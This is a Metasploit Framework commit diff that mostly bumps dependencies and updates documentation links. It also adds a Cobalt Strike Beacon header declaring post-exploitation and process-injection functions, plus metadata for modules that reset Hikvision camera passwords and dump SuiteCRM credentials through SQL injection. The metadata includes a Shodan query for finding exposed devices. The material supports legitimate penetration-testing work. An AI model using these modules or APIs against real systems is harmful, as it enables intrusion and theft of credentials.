automatic module_metadata_base.json update

Land #17032 , Add module for pfSense pfBlockNG unauth RCE as root - CVE-2022-31814
Add TARGET 0 to documentation
2022-10-12 21:51:32 -05:00 · 2022-10-12 21:28:01 -05:00 · 2022-10-12 20:00:33 -05:00 · 2022-10-12 19:16:52 -05:00 · 2022-10-12 19:16:52 -05:00 · 2022-10-12 19:16:44 -05:00
293 changed files with 22662 additions and 2740 deletions
@@ -35,7 +35,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
+          - 2.7

    name: Lint msftidy
    steps:
@@ -73,6 +73,10 @@ jobs:
        exclude:
          - { os: ubuntu-latest, ruby: 2.7 }
          - { os: ubuntu-latest, ruby: 3.0 }
+        include:
+          - os: ubuntu-latest
+            ruby: 3.1
+            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -16,7 +16,10 @@ group :development do
  gem 'yard'
  # for development and testing purposes
  # lock to version with 2.6 support until project updates
-  gem 'pry-byebug', "~> 3.9.0"
+  gem 'pry-byebug', '~> 3.9.0'
+  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
+  # Replaces the old lib/debug.rb and provides more features.
+  gem 'debug', '>= 1.0.0'
  # module documentation
  gem 'octokit'
  # memory profiling
@@ -25,7 +28,7 @@ group :development do
  gem 'ruby-prof', '1.4.2'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  # gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -46,4 +49,3 @@ group :test do
  # Manipulate Time.now in specs
  gem 'timecop'
 end
-
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.17)
+    metasploit-framework (6.2.22)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -30,9 +30,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.94)
+      metasploit-payloads (= 2.0.97)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.18)
+      metasploit_payloads-mettle (= 1.0.20)
      mqtt
      msgpack
      nessus_rest
@@ -97,25 +97,25 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.6.1)
-      actionview (= 6.1.6.1)
-      activesupport (= 6.1.6.1)
+    actionpack (6.1.7)
+      actionview (= 6.1.7)
+      activesupport (= 6.1.7)
      rack (~> 2.0, >= 2.0.9)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.6.1)
-      activesupport (= 6.1.6.1)
+    actionview (6.1.7)
+      activesupport (= 6.1.7)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.6.1)
-      activesupport (= 6.1.6.1)
-    activerecord (6.1.6.1)
-      activemodel (= 6.1.6.1)
-      activesupport (= 6.1.6.1)
-    activesupport (6.1.6.1)
+    activemodel (6.1.7)
+      activesupport (= 6.1.7)
+    activerecord (6.1.7)
+      activemodel (= 6.1.7)
+      activesupport (= 6.1.7)
+    activesupport (6.1.7)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
@@ -128,13 +128,13 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.624.0)
-    aws-sdk-core (3.137.0)
+    aws-partitions (1.628.0)
+    aws-sdk-core (3.145.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.525.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.329.0)
+    aws-sdk-ec2 (1.331.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-iam (1.70.0)
@@ -160,6 +160,9 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
+    debug (1.6.2)
+      irb (>= 1.3.6)
+      reline (>= 0.3.1)
    diff-lcs (1.5.0)
    digest (3.1.0)
    dnsruby (1.61.9)
@@ -183,7 +186,7 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.22.0)
+    faker (2.23.0)
      i18n (>= 1.8.11, < 2)
    faraday (2.5.2)
      faraday-net_http (>= 2.0, < 3.1)
@@ -229,11 +232,11 @@ GEM
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.0)
    metasm (1.0.5)
-    metasploit-concern (4.0.4)
+    metasploit-concern (4.0.5)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-credential (5.0.8)
+    metasploit-credential (5.0.9)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -247,7 +250,7 @@ GEM
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.94)
+    metasploit-payloads (2.0.97)
    metasploit_data_models (5.0.5)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -258,7 +261,7 @@ GEM
      railties (~> 6.0)
      recog (~> 2.0)
      webrick
-    metasploit_payloads-mettle (1.0.18)
+    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
    mini_portile2 (2.8.0)
    minitest (5.16.3)
@@ -323,9 +326,9 @@ GEM
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.4.3)
      loofah (~> 2.3)
-    railties (6.1.6.1)
-      actionpack (= 6.1.6.1)
-      activesupport (= 6.1.6.1)
+    railties (6.1.7)
+      actionpack (= 6.1.7)
+      activesupport (= 6.1.7)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -351,7 +354,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.35)
+    rex-exploitation (0.1.36)
      jsobfu
      metasm
      rex-arch
@@ -365,20 +368,20 @@ GEM
      rex-arch
    rex-ole (0.1.7)
      rex-text
-    rex-powershell (0.1.96)
+    rex-powershell (0.1.97)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.8)
+    rex-random_identifier (0.1.9)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.41)
+    rex-socket (0.1.43)
      rex-core
-    rex-sslscan (0.1.7)
+    rex-sslscan (0.1.8)
      rex-core
      rex-socket
      rex-text
@@ -394,7 +397,7 @@ GEM
      rspec-mocks (~> 3.11.0)
    rspec-core (3.11.0)
      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.0)
+    rspec-expectations (3.11.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.11.0)
    rspec-mocks (3.11.1)
@@ -410,8 +413,8 @@ GEM
      rspec-support (~> 3.10)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.0)
-    rubocop (1.35.1)
+    rspec-support (3.11.1)
+    rubocop (1.36.0)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.1.2.1)
@@ -450,7 +453,8 @@ GEM
      rack (~> 2.2)
      rack-protection (= 2.2.2)
      tilt (~> 2.0)
-    sqlite3 (1.4.4)
+    sqlite3 (1.5.0)
+      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
    thin (1.8.1)
@@ -501,6 +505,7 @@ PLATFORMS
  ruby

 DEPENDENCIES
+  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
  memory_profiler
@@ -15,6 +15,10 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0
+
 Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
@@ -1,18 +1,18 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.6.1, MIT
-actionview, 6.1.6.1, MIT
-activemodel, 6.1.6.1, MIT
-activerecord, 6.1.6.1, MIT
-activesupport, 6.1.6.1, MIT
+actionpack, 6.1.7, MIT
+actionview, 6.1.7, MIT
+activemodel, 6.1.7, MIT
+activerecord, 6.1.7, MIT
+activesupport, 6.1.7, MIT
 addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.624.0, "Apache 2.0"
-aws-sdk-core, 3.137.0, "Apache 2.0"
-aws-sdk-ec2, 1.329.0, "Apache 2.0"
+aws-partitions, 1.628.0, "Apache 2.0"
+aws-sdk-core, 3.145.0, "Apache 2.0"
+aws-sdk-ec2, 1.331.0, "Apache 2.0"
 aws-sdk-iam, 1.70.0, "Apache 2.0"
 aws-sdk-kms, 1.58.0, "Apache 2.0"
 aws-sdk-s3, 1.114.0, "Apache 2.0"
@@ -29,6 +29,7 @@ concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+debug, 1.6.2, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 digest, 3.1.0, "ruby, Simplified BSD"
 dnsruby, 1.61.9, "Apache 2.0"
@@ -41,7 +42,7 @@ erubi, 1.11.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.22.0, MIT
+faker, 2.23.0, MIT
 faraday, 2.5.2, MIT
 faraday-net_http, 3.0.0, MIT
 faraday-retry, 2.0.0, MIT
@@ -68,13 +69,13 @@ logging, 2.3.1, MIT
 loofah, 2.18.0, MIT
 memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.4, "New BSD"
-metasploit-credential, 5.0.8, "New BSD"
-metasploit-framework, 6.2.17, "New BSD"
+metasploit-concern, 4.0.5, "New BSD"
+metasploit-credential, 5.0.9, "New BSD"
+metasploit-framework, 6.2.22, "New BSD"
 metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.97, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
-metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
 minitest, 5.16.3, MIT
@@ -113,7 +114,7 @@ rack-protection, 2.2.2, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.4.3, MIT
-railties, 6.1.6.1, MIT
+railties, 6.1.7, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
@@ -125,30 +126,30 @@ rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.28, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.35, "New BSD"
+rex-exploitation, 0.1.36, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
 rex-ole, 0.1.7, "New BSD"
-rex-powershell, 0.1.96, "New BSD"
-rex-random_identifier, 0.1.8, "New BSD"
+rex-powershell, 0.1.97, "New BSD"
+rex-random_identifier, 0.1.9, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.41, "New BSD"
-rex-sslscan, 0.1.7, "New BSD"
+rex-socket, 0.1.43, "New BSD"
+rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.44, "New BSD"
+rex-text, 0.2.45, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.11.0, MIT
 rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.0, MIT
+rspec-expectations, 3.11.1, MIT
 rspec-mocks, 3.11.1, MIT
 rspec-rails, 5.1.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.0, MIT
-rubocop, 1.35.1, MIT
+rspec-support, 3.11.1, MIT
+rubocop, 1.36.0, MIT
 rubocop-ast, 1.21.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
@@ -163,7 +164,7 @@ simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
 sinatra, 2.2.2, MIT
-sqlite3, 1.4.4, "New BSD"
+sqlite3, 1.5.0, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
@@ -3,25 +3,31 @@ Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.sv
 The Metasploit Framework is released under a BSD-style license. See
 [COPYING](COPYING) for more details.

-The latest version of this software is available from: https://metasploit.com
+The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

-Bug tracking and development information can be found at:
- https://github.com/rapid7/metasploit-framework
+You can find documentation on Metasploit and how to use it at:
+ https://docs.metasploit.com/
+
+Information about setting up a development environment can be found at:
+ https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+
+Our bug and feature request tracker can be found at:
+ https://github.com/rapid7/metasploit-framework/issues

 New bugs and feature requests should be directed to:
  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
-  https://rapid7.github.io/metasploit-framework/api
+  https://docs.metasploit.com/api/

 Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -29,21 +35,20 @@ Using Metasploit
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
 reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or the [wiki].
+resources](https://metasploit.github.io), or take a look at the
+[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
+page on the documentation website.

 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+See the [Dev Environment Setup][devenv] guide on GitHub, which will
 walk you through the whole process from installing all the
 dependencies, to cloning the repository, and finally to submitting a
 pull request. For slightly more information, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).


-[wiki]: https://github.com/rapid7/metasploit-framework/wiki
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
-[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
-[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
 [unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
@@ -54,3 +54,4 @@ easy-wp-smtp
 duplicator_download
 custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart
+elementor
@@ -525,7 +525,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/admin/db2/db2rcmd.rb",
    "is_install_path": true,
    "ref_name": "admin/db2/db2rcmd",
@@ -1758,7 +1758,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-19 20:42:23 +0000",
+    "mod_time": "2022-09-29 01:28:56 +0000",
    "path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py",
    "is_install_path": true,
    "ref_name": "admin/http/grafana_auth_bypass",
@@ -1770,6 +1770,67 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/http/hikvision_unauth_pwd_reset_cve_2017_7921": {
+    "name": "Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic",
+    "fullname": "auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2017-09-23",
+    "type": "auxiliary",
+    "author": [
+      "Monte Crypto",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "Many Hikvision IP cameras contain improper authentication logic which allows unauthenticated impersonation of any configured user account.\n          The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it\n          affects many white-labeled camera products sold under a variety of brand names.\n\n          Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time\n          of publishing (shodan search: '\"App-webs\" \"200 OK\"'). Some of these devices can never be patched due to to the\n          vendor preventing users from upgrading the installed firmware on the affected device.\n\n          This module utilizes the bug in the authentication logic to perform an unauthenticated password change of any user account on\n          a vulnerable Hikvision IP Camera. This can then be utilized to gain full administrative access to the affected device.",
+    "references": [
+      "CVE-2017-7921",
+      "PACKETSTORM-144097",
+      "URL-https://ipvm.com/reports/hik-exploit",
+      "URL-https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921",
+      "URL-https://seclists.org/fulldisclosure/2017/Sep/23"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-09-23 12:19:29 +0000",
+    "path": "/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/hikvision_unauth_pwd_reset_cve_2017_7921",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/http/hp_web_jetadmin_exec": {
    "name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution",
    "fullname": "auxiliary/admin/http/hp_web_jetadmin_exec",
@@ -2959,7 +3020,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-24 10:44:10 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -3487,7 +3548,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-05-04 19:42:39 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/auxiliary/admin/http/pihole_domains_api_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/pihole_domains_api_exec",
@@ -4037,7 +4098,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-10-03 16:30:12 +0000",
+    "mod_time": "2022-10-01 17:54:59 +0000",
    "path": "/modules/auxiliary/admin/http/tomcat_ghostcat.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_ghostcat",
@@ -4049,7 +4110,7 @@
        "Ghostcat"
      ],
      "Stability": [
-        "CRASH_SAFE"
+        "crash-safe"
      ],
      "Reliability": [

@@ -4647,7 +4708,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-06-10 14:01:57 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_automatic_plugin_privesc",
@@ -7883,7 +7944,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb",
    "is_install_path": true,
    "ref_name": "admin/scada/modicon_password_recovery",
@@ -8999,7 +9060,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-04-25 11:44:39 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb",
    "is_install_path": true,
    "ref_name": "admin/vmware/vcenter_forge_saml_token",
@@ -13870,7 +13931,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/guildftp_cwdlist",
@@ -14039,7 +14100,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/titan626_site",
@@ -14081,7 +14142,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/vicftps50_list",
@@ -14163,7 +14224,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/xmeasy560_nlst",
@@ -14204,7 +14265,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/xmeasy570_nlst",
@@ -14296,7 +14357,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-03-16 14:03:20 +0000",
+    "mod_time": "2022-10-01 17:54:59 +0000",
    "path": "/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166",
@@ -14308,9 +14369,10 @@
        "crash-os-restarts"
      ],
      "Reliability": [
-        "ioc-in-logs"
+
      ],
      "SideEffects": [
+        "ioc-in-logs",
        "screen-effects"
      ]
    },
@@ -21289,6 +21351,65 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/suite_crm_export_sqli": {
+    "name": "SuiteCRM authenticated SQL injection in export functionality",
+    "fullname": "auxiliary/gather/suite_crm_export_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-05-24",
+    "type": "auxiliary",
+    "author": [
+      "Exodus Intelligence",
+      "jheysel-r7",
+      "Redouane NIBOUCHA <rniboucha@yahoo.fr>"
+    ],
+    "description": "This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability\n          allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order\n          to retrieve all the usernames and their associated password from the database.",
+    "references": [
+      "URL-https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/",
+      "URL-https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-09-12 23:46:10 +0000",
+    "path": "/modules/auxiliary/gather/suite_crm_export_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/suite_crm_export_sqli",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/teamtalk_creds": {
    "name": "TeamTalk Gather Credentials",
    "fullname": "auxiliary/gather/teamtalk_creds",
@@ -21588,7 +21709,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-01-03 19:13:32 +0000",
+    "mod_time": "2022-10-03 10:41:15 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -23624,7 +23745,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/colorado_ftp_traversal",
@@ -24868,7 +24989,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-11-21 22:35:15 +0000",
+    "mod_time": "2022-10-05 13:19:36 +0000",
